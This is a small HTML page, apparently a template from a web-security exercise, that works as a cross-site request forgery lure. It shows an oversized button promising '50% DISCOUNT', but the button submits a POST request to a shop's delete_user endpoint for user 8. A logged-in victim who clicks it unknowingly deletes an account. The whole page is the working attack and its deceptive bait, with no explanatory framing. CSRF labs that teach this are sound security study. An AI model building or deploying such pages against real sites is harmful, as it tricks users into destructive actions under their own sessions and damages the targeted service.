<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<style>
.container {
  position: relative;
  text-align: center;
  color: white;
}

.bottom-left {
  position: absolute;
  bottom: 8px;
  left: 16px;
}


</style>
</head>
<body>

<div class="container">
  <img src="{{ url_for('static',filename='image.jpeg')}}">
  <div class="bottom-left">
    <form action="http://rtgshop.com//delete_user?idn=8" method = "POST">
    <input type="submit" style="font-face: 'Comic Sans MS';font-weight: bold; font-size: 20px; color: #008000; width: 1450px">CLICK HERE TO GET 50% DISCOUNT!!!
</form>
  </div>
</div>
</body>
</html> 




